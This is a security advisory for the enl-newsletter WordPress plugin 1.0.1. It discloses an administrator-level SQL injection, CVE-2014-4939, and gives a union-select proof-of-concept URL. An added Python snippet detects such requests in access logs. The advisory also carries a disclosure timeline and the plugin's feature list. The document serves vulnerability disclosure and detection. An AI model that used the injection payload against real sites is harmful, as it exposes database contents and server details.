wp-plugin : enl-newsletter – A1-Injection


Plugin Details


Plugin Name : enl-newsletter


Affected Version : 1.0.1 (and most probably lower versions, if any)

Vulnerability : A1-Injection
Identified by : Anant Shrivastava



Technical Details


Minimum Level of Access Required : Administrator


PoC - (Proof of Concept) :


http://localhost/wp-admin/admin.php?page=enl-add-new&id=2 union select 1,@@version,3,user(),database(),6,7,8,9,0,1
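One way to spot requests shaped like the PoC above in web-server access logs, as an added example that is not part of the original advisory or the plugin's code. It assumes combined-format access logs and that a legitimate `id` is always a plain integer; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry. The target is matched
# lazily so a raw (unencoded) space in the URL does not break parsing.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")

def suspicious_id(line):
    """Return the decoded `id` value when a request to the enl-add-new admin
    page carries a non-integer id; return None otherwise."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/wp-admin/admin.php"):
        return None
    params = parse_qs(url.query)  # decodes %XX and '+' once
    if "enl-add-new" not in params.get("page", []):
        return None
    # Allowlist check (assumption: a legitimate id is a plain integer), which
    # also flags double-encoded or mixed-case payloads a keyword list misses.
    for value in params.get("id", []):
        if not INTEGER_RE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_id) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_id(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log lines (documentation IP range, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jun/2014:10:00:00 +0000] "GET /wp-admin/admin.php?page=enl-add-new&id=2 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jun/2014:10:00:05 +0000] "GET /wp-admin/admin.php?page=enl-add-new&id=2%20union%20select%201,@@version,3 HTTP/1.1" 200 5342',
    '203.0.113.5 - - [01/Jun/2014:10:00:09 +0000] "GET /wp-admin/admin.php?page=enl-add-new&id=2+UNION+SELECT+1 HTTP/1.1" 200 5342',
    '203.0.113.5 - - [01/Jun/2014:10:00:12 +0000] "GET /wp-admin/admin.php?page=other-page&id=abc HTTP/1.1" 200 830',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious id={value!r}")
```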


Disclosure Timeline


Vendor Contacted : 2013-12-28

Plugin Status : No Change
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4939

Plugin Description :
**Main Features:**

1. Setup multiple newsletters according to the post categories.
2. Different send modes include manual, weekly and monthly.
3. Custom newsletter content, template and post count.
4. Newsletter signup widget for user registration.
5. Subscriber info list containing email, IP and registration time.
6. Import WordPress users to subscriber list.

**More info:**

* [Leave a comment](http://www.wp-coder.net/enl-newsletter/)
